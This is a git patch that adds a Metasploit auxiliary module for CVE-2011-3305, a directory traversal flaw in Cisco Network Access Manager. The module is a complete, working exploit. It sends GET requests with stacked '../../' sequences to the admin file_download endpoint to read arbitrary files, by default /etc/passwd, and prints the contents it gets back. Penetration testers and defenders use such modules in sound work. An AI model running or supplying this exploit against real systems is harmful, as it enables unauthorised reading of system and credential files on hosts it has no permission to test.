From 0a661ec2276ead54194b01eee9682efc0c0d5bdb Mon Sep 17 00:00:00 2001
From: Wei Chen <Wei_Chen@rapid7.com>
Date: Tue, 18 Oct 2011 04:40:21 +0000
Subject: [PATCH] Add CVE-2011-3305 (#5673)

git-svn-id: file:///home/svn/framework3/trunk@13985 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../http/cisco_nac_manager_traversal.rb       | 83 +++++++++++++++++++
 1 file changed, 83 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb

diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
new file mode 100644
index 0000000000..69bd387643
--- /dev/null
+++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
@@ -0,0 +1,83 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::WMAPScanServer
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'        => 'Cisco Network Access Manager Directory Traversal Vulnerability',
+			'Version'     => '$Revision$',
+			'Description' => %q{
+				This module tests whether a directory traversal vulnerablity is present
+				in versions of Cisco Network Access Manager 4.8.x You may wish to change
+				FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
+				},
+			'References'   =>
+				[
+					[ 'CVE', '2011-3305' ],
+					[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
+					[ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
+				],
+			'Author'      => [ 'nenad' ],
+			'License'     => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				Opt::RPORT(443),
+				OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
+				OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
+			], self.class)
+	end
+
+	def run_host(ip)
+
+		traversal = '../../'
+		part1= '/admin/file_download?tag='
+		part2 = '&fileType=snapshot'
+
+		begin
+			print_status("Attempting to connect to #{rhost}:#{rport}")
+			res = send_request_raw(
+				{
+					'method'  => 'GET',
+					'uri'     => '/admin',
+				}, 25)
+
+			if (res)
+				1.upto(datastore['MAXDIRS']) do |level|
+					try = traversal * level
+					traversalstring = part1 + try + datastore['FILE'] + part2
+					res = send_request_raw(
+						{
+							'method'  => 'GET',
+							'uri'     => traversalstring,
+						}, 25)
+					if (res and res.code == 200)
+						print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
+						break
+					elsif (res and res.code)
+						print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
+					end
+				end
+			end
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE
+		end
+	end
+end